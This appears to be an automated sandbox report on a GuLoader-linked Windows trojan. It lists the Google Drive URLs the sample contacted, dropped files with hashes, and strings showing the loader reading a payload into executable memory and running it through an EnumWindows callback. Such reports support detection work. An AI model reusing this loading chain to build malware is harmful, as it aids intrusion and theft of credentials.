          https://www.google.comMNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://www.google.cokMNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.usercontent.google.com/PhGMNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://drive.google.com/MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://crl.microsofMNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1770338681.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://drive.google.com/NYpMNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://drive.google.com/rMNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://drive.usercontent.google.com/MhXMNLS4PjscF.exe, 00000008.00000003.1770338681.00000000078B1000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.usercontent.google.com/MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1770338681.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1820603100.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1846585634.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1898053327.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078B0000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1796268741.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://apis.google.comMNLS4PjscF.exe, 00000008.00000003.2001657231.00000000078B1000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000002.2139939778.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.000000000789E000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1975210550.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.2053656397.00000000078AD000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://nsis.sf.net/NSIS_ErrorErrorMNLS4PjscF.exe, 00000000.00000002.1550432579.0000000000409000.00000004.00000001.01000000.00000003.sdmp, MNLS4PjscF.exe, 00000000.00000000.879599687.0000000000409000.00000008.00000001.01000000.00000003.sdmp, MNLS4PjscF.exe, 00000008.00000000.1546772030.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                            high
                            https://drive.google.com/_1MNLS4PjscF.exe, 00000008.00000002.2139939778.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl.microsoft.MNLS4PjscF.exe, 00000008.00000003.1694469091.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1694535877.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://crl.microsMNLS4PjscF.exe, 00000008.00000003.1694469091.00000000078B8000.00000004.00000020.00020000.00000000.sdmp, MNLS4PjscF.exe, 00000008.00000003.1694535877.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                142.250.186.142
                                drive.google.comUnited States
                                15169GOOGLEUSfalse
                                142.250.186.33
                                drive.usercontent.google.comUnited States
                                15169GOOGLEUSfalse
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1632411
                                Start date and time:2025-03-07 23:28:28 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 40s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:MNLS4PjscF.exe
                                renamed because original name is a hash value
                                Original Sample Name:2baf2894d28fffff439499fbcd6b92714febd8ea39c0850f60f4575adedef15b.exe
                                Detection:MAL
                                Classification:mal84.troj.evad.winEXE@3/30@2/2
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 91%
                                • Number of executed functions: 54
                                • Number of non-executed functions: 78
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                • Execution Graph export aborted for target MNLS4PjscF.exe, PID 5684 because there are no executed function
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                TimeTypeDescription
                                17:30:48API Interceptor8x Sleep call for process: MNLS4PjscF.exe modified
                                No context
                                No context
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                37f463bf4616ecd445d4a1937da06e19GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                2Jq4fZJIJ8.exeGet hashmaliciousGuLoaderBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                GyGE2VaBFL.exeGet hashmaliciousGuLoaderBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                1258ad6Jpw.exeGet hashmaliciousGuLoaderBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                ZUY4Nq2SyY.exeGet hashmaliciousGuLoaderBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 142.250.186.142
                                • 142.250.186.33
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Users\user\AppData\Local\Temp\nsxBF78.tmp\System.dllGBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      Steel Sample- QUOTE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        Steel Sample- QUOTE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          Skambenets.exeGet hashmaliciousGuLoaderBrowse
                                            Skambenets.exeGet hashmaliciousGuLoaderBrowse
                                              Marcom Trade SS-04665.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                  SecuriteInfo.com.FileRepMalware.23885.29286.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):33
                                                    Entropy (8bit):4.33197669498491
                                                    Encrypted:false
                                                    SSDEEP:3:U4ooQGRDWh:hooQh
                                                    MD5:340AD700CF73B73EA2313C044D40EA9A
                                                    SHA1:9B90CC3147D140FA936E308C2C320BDC385DA93A
                                                    SHA-256:55A2B8F5EF1D17023FD8245E69830CC961C0CE629EDDC7AC1043C288CB3915B5
                                                    SHA-512:4B31D10B80AE71197AC367C868569949224A4CD542BF0E9C188B816348EC8958F952525F939C827BDDC8610F268DD12E310D6D2FC99071C741B3A38E062542B4
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:[Chocho240]..struct=finkulturel..
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):47
                                                    Entropy (8bit):4.628848957968553
                                                    Encrypted:false
                                                    SSDEEP:3:YOm45GXQLQIfLBJXmgxv:5TGXQkIP2I
                                                    MD5:B895D576D6637A778B387B2FCA0F56EC
                                                    SHA1:E78D2BE4D94673D612C16D29C330BB0C78778429
                                                    SHA-256:BFEC1E97ED5D34825521D60B98986D1564CD159B4D1F9569EAE4C3464D2F5C47
                                                    SHA-512:B4A771D1B517A2776BA440F79F168306C244DF1A6DE1966313157154D8D52BEAD8131B95F846C2F55C15382E04284FFFC6CF6ABF3F6FCFCB259DF2EA58D769E5
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:[Current]..Ini=user32::EnumWindows(i r1 ,i 0)..
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2129096
                                                    Entropy (8bit):5.480154099747067
                                                    Encrypted:false
                                                    SSDEEP:49152:vn9caFqd9Dv9YpvkOtFu0mBFmvYFe0m40mD0mbXCP:v9caI9Ypv5twRrgoTU
                                                    MD5:1A31BCE4E868014E605CCB1ED43E6388
                                                    SHA1:C7EA246EB669762AEAE3E64626936ECF9168D711
                                                    SHA-256:A9AECDB8CE4802482940AA6C14C5BD04E2EF983FAE29ECC9197B170518ED5DD6
                                                    SHA-512:4D3EAE0E86E6ECF6369D188A021C71F11E09F682F5EEBBDDF0FA628FE052690ACB7AE4372753221FA6C6E90C592AAD2CE1975E85150D88859B0D74E4E33091C2
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.,......,................................+.......,..........................................................................................................................................................................................................................................G...Y...............j...............................................................................................................................g...............................................................................#.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):52
                                                    Entropy (8bit):4.0914493934217315
                                                    Encrypted:false
                                                    SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                    MD5:5D04A35D3950677049C7A0CF17E37125
                                                    SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                    SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                    SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):56
                                                    Entropy (8bit):4.264383994261771
                                                    Encrypted:false
                                                    SSDEEP:3:sAAEVvjsNXKwL84n:fLsXD
                                                    MD5:FFE600086504D94D0E7E2F8A331F5D85
                                                    SHA1:1FB3FA48BFA30F04FC957C05A90C824FDB38F048
                                                    SHA-256:EB6C41469BC87CBE962DB30D4BC3772CC2EDFA9D216E51F5E93A06A51FBAB86D
                                                    SHA-512:42D46FC0C26A4ADC5EEBB4B129378F36CA6A91434D6060B11F22A209F20B840F28681A62C22D751142019F746C131DA16578FB8687C52DE0706E6BCBE51417D2
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:kernel32::ReadFile(i r5, i r1, i 98652160,*i 0, i 0)i.r3
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):74
                                                    Entropy (8bit):3.9637832956585757
                                                    Encrypted:false
                                                    SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                    MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                    SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                    SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                    SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.52973742089034
                                                    Encrypted:false
                                                    SSDEEP:3:sEMBQEJkJVEjXTQXK5xQoXUn:BXUxvUn
                                                    MD5:D4453567A455B741556C4DE15C9F6446
                                                    SHA1:410FD7474030E724F52D4E30F5F12027CE4869DB
                                                    SHA-256:A1FA0DCDBE660BE838CD82F50BEA1C422988CDD527009F26B4F3DD314106C46E
                                                    SHA-512:45247F2AC6631E83BF7BCC8AD56C775689E8A4A1E18C3355B0A02AE9498854CA71033396C9BD6570833342C6CFAF1C4427D064E8515DA383BBF04A25E347E0EE
                                                    Malicious:false
                                                    Preview:kernel32::VirtualAlloc(i 0,i 98652160, i 0x3000, i 0x40)p.r1
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):30
                                                    Entropy (8bit):4.256564762130954
                                                    Encrypted:false
                                                    SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                    MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                    SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                    SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                    SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                    Malicious:false
                                                    Preview:user32::EnumWindows(i r1 ,i 0)
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):11264
                                                    Entropy (8bit):5.813979271513012
                                                    Encrypted:false
                                                    SSDEEP:192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
                                                    MD5:7399323923E3946FE9140132AC388132
                                                    SHA1:728257D06C452449B1241769B459F091AABCFFC5
                                                    SHA-256:5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
                                                    SHA-512:D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: GBYfjUz4a5.exe, Detection: malicious, Browse
                                                    • Filename: BtCQu5APhK.exe, Detection: malicious, Browse
                                                    • Filename: GuuQOl5kJR.exe, Detection: malicious, Browse
                                                    • Filename: Steel Sample- QUOTE.exe, Detection: malicious, Browse
                                                    • Filename: Steel Sample- QUOTE.exe, Detection: malicious, Browse
                                                    • Filename: Skambenets.exe, Detection: malicious, Browse
                                                    • Filename: Skambenets.exe, Detection: malicious, Browse
                                                    • Filename: Marcom Trade SS-04665.exe, Detection: malicious, Browse
                                                    • Filename: Hermaean.exe, Detection: malicious, Browse
                                                    • Filename: SecuriteInfo.com.FileRepMalware.23885.29286.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....f.R...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..B....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):38720
                                                    Entropy (8bit):4.559800120228938
                                                    Encrypted:false
                                                    SSDEEP:768:mEnxVfKxpxr2nSuTYOn3SNpkhXQeclp7u6+Y7wNBJ:meVCd2LsOIk+TDuNd
                                                    MD5:69B437B47D51431F4999052D686B3C9D
                                                    SHA1:02ACE3384FFE99470060A7DEE66F123344A47787
                                                    SHA-256:CFC48C38571EAD57A568AA56565B39BF26B0539457EBF70A044133EDCF7EC411
                                                    SHA-512:A43EB73588DFCE4A04E2896EC347E00BCE2F5F145BFCA8D7B2EC99B9E43E5E0165A7A2BC9D333BC1D71396F726A8F2CA0805369D65B0C47121CBEE3A78D42F18
                                                    Malicious:false
                                                    Preview:..........U..$$......R..........ww........`.......jj.......q........................................ss..............P.......000.0.Z.......................2...).sss.............:................................g........+++.W..--.......44. .}}.........2.111..{{..................O.................o...........eee.......***........................~.....5..[[..xxx.>>..j.........<.....(...R..........................~..;..ZZ...............OO................~......3....xxxx.;;;.....c..................... ...Y...::...ii..................].nn.).........nn.7..............11...w................QQQQ.....((..............OOO.(............bb..................|.........?......QQ..................................WWW..EE..##......................bb..................66.9.....AAA.......}.........__...............ee...................w........!................VV..................mmm............Y.yyyyyyyy..............ppp.....```..............................eee.....".::::..PPP....VVV...........h....ee..SS
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 607x510, components 3
                                                    Category:dropped
                                                    Size (bytes):116646
                                                    Entropy (8bit):7.9723106052665536
                                                    Encrypted:false
                                                    SSDEEP:3072:Cq3EK4+CecuNPZ23e6at5JG7QXnv0tD6nI:Cq3PRCeTZ1tspwI
                                                    MD5:2400D62D49391C7874C3DF868B3399ED
                                                    SHA1:F5AF15AAE9EE9BD00F459D67EBBCDB8E48B6D4A3
                                                    SHA-256:C400565DCC08D080953E47902F2946C687C4F814C3BA51E0D4E63E4242112566
                                                    SHA-512:7CE7C0DAA1B222DD67D6292F9FE3A9BDFB0782C790D817C0B4B348B8D8AB7B5630D8DBFB953ED55093DFB2DCABF8FBB257A4ED666B2145D8946E0D2C082DB70B
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........_.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...gG..(..;..n.%`...2w.~.V.5...D...U........$..r|.>....Y=..c8...Ae...V.....i..H.....Z....7b.1.........mm...F.A...A.....L..'m......[f.U.n.......jZ.p.....-..A.'....R.1TP....=*K(.x..r..[....I..z".[...#..[qV.d....oh:].nd.XY...H....s.L ......K. .;.3..-...9dR.@7..V.|}...|..Sk.c..eP..r.(.....C.V..6.^.4.S..[...}.i.nd.....R....=O.>.n^1.A$..P7.'.?QY...I]..........B.X
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):439122
                                                    Entropy (8bit):7.092576485156292
                                                    Encrypted:false
                                                    SSDEEP:12288:vnLQmOSHmgIcmz2F9U1fLjtPNpTZh9Ys8IeG:vn0uHBrmaF9U1f3NNp9h9YpvG
                                                    MD5:1CBF6CC43016032CFCCB35CCFA3ED06F
                                                    SHA1:1B7554E0945B28AAF2B7C872EE9727C40E2F2211
                                                    SHA-256:65FCE8874CD3297D1FAD0BD26093EC26A392D068F1372E963BFF2F5A5F705B88
                                                    SHA-512:0C13854187B62E62BF9E61F1060B7F823EEA7D6C5C28ADC3410FDD6EA15906B369EA613183C5C3F6226E6C895FF0830E222C138014BED83423854677D2571595
                                                    Malicious:false
                                                    Preview:.........................................CCC.......BB...P.................___..H.......................w.......>>...................UU..ff.........OOO......w...............................""................................q........N......))..i.JJJJJ...u.++.......^..cccc......JJJ..1........................KK................................LLLL...........K.>..........C..........kkkk............jjjjj...........}}}...........9...uuuu.dd.a....ii................uu....\\\.........}.................QQ......PP.....%........***......[[..((................................................F........iiiiiii..VVVVVVVVV...............................................9..GGGGGGG..^................<."".....0.........|....A...............p........,.BB.........QQ.......................VV..++.............kk.........z.TTT...........I............................gg........''................___.....HHHHHHHHHH..............T.....||||...NN.2222..........''....jj.*..........555.............qqq..$$$...... .%%.......
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 670x109, components 3
                                                    Category:dropped
                                                    Size (bytes):10701
                                                    Entropy (8bit):7.839639743360956
                                                    Encrypted:false
                                                    SSDEEP:192:Lzr3FqEXWDs3kosNACUJ2PDTHjHzCM4guHBTGgAuihMBvUjhIaRTHO:3r3FqCd3Bsy1IPDTDebgkTG1XNHO
                                                    MD5:6AB549CF24DE4802D3806218FDC48906
                                                    SHA1:DADA9FCA4EC7121494CC70B3E7A2018E0F8116CA
                                                    SHA-256:D484ED1BD415EC1F924CA80A2B8EBD60FF02998A3AD3028145C75900F51F19DF
                                                    SHA-512:FDB7BD49B53E243FBDD3FF6613BDC0F47E6ACBE378EC9599263393B121395DCA0B23D978B7029F058B5AEBE4264EB356C945C0EB1AB00B3D6A3E75EE6D4D8651
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......m...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..vQ.......Olf.6.Q....z~.....?:6.j.....m.E..F.q..........q.?:.....q.)v...qK.."...(......J.....[.G.G....t.1@....I.../.N.....{..K..U......$....G...~b..0(..S.....B..#...T..b.........W.K..F(..X..~ty_..N...........Y..~t.Q@.....O..3}.~&......>...5*...H...(.....~t.3....qF(.l..i.:6...b.........xS....h..h...6..-&.....-........`.....bm.......Rb...uqL.........c.....h
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):355
                                                    Entropy (8bit):4.365173801202148
                                                    Encrypted:false
                                                    SSDEEP:6:a33GWsurYzIbhGvPiUWrFArTWzgVJ86CcE6LpA6rMrLGbGVPoHknd3TFKA8iWFzK:amN9C0vPQqrqsj86Cck6kVPoEnFweWKp
                                                    MD5:52728264A79BB126BC05A9339A806437
                                                    SHA1:031F624DC90E451583A740F03B0432F63FB472DE
                                                    SHA-256:8D23AFDA0BB6BFD4399AF4AEBFAA8196644DCD468D1E6705C2388E7DB49F8D4A
                                                    SHA-512:EFC41C3E278119CFEDBC039153FE6374C5DB4DBD95E10969768115EFA463D9E38CBC0C3DC2469D200C775AF7851E4B77AB4AE63B5456E4DE996EB21A94903519
                                                    Malicious:false
                                                    Preview:Vekselrytterne kolostomi skamskndede ufortrdent stableman unisolate fancical..[shrouds brasekartoffels]......aftagere afterband rituel.Limiterede corregidors vgtningen debouches caribed entopic bankkredit dopey hjemfrsel..;karaktertrkkene venulose snadret angelikas heroizing nitrosyls.Remonteres interesseomraader moslings propolsserne dilution refulge..
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 666x357, components 3
                                                    Category:dropped
                                                    Size (bytes):34271
                                                    Entropy (8bit):7.9659073424878555
                                                    Encrypted:false
                                                    SSDEEP:768:4WE6omjLoyBWuDNGNceCXyQezdhoMB8q+ljUsYU1xhbU3vCH:4Uom4yBhmQi7eK8q+lpJRUfCH
                                                    MD5:868F1BE25FA5F82DE53C0CE9EA030CA3
                                                    SHA1:ECA9A135448D5C0F613209FF3516CAE3716BF0E3
                                                    SHA-256:5FD97F664356EE61E6182C19DC0AF76318B4AA9AF75D674F11EB45DEF3D66526
                                                    SHA-512:6A67BE639F4A4A8A24587ED6B1D67F276F41BC750B0FC74C49A69FF9293F57ACAE6DEF3423C8DF06805A1BB7CE894F4359510B3A27E2E1F388D065A618479E21
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......e...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j\R.zq]G(...z......Hi.."..E.....G.J..P..)..P.h&..L{P..r..I.;RP .R.\.]....Fh..P..b....8b...A=...4..E...\P)(.v4..4dsI.h..-..R..q.))....M..i...(.A.P.b.)2(......)E....{.G4...(.`..SE:.0..R.@...9F.-...)z.GJ^.....Z..h.4.h.i(...(....../Z)q@...ZZ^....ZP3...-.{..Z.3G..P!..:../.0.y..K.ZhCE....Z.%...E.7.`R...r>..LQ..6......j..?......&)6..O.=.q..4.1..zPE. ZO.Gj.7.Q.u.
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 564x766, components 3
                                                    Category:dropped
                                                    Size (bytes):78838
                                                    Entropy (8bit):7.9645085314331405
                                                    Encrypted:false
                                                    SSDEEP:1536:0aI5v5+r/WGPIAVQIhrVMZXPizutOFGlin5ZSk2iFJNfgJSYrLfEXWMp:I55e/pVQIhrqKusGkmkPnNYhX2R
                                                    MD5:C994CB2032DBA92B7E631171678EC43D
                                                    SHA1:E206DF32EA7F37FA26075E0456786E138AC27AE1
                                                    SHA-256:3D6B9E81DA6DF4A9432CDB4168EE8F8B26CC88E47FDB9BB8A6D967FB1AB241E3
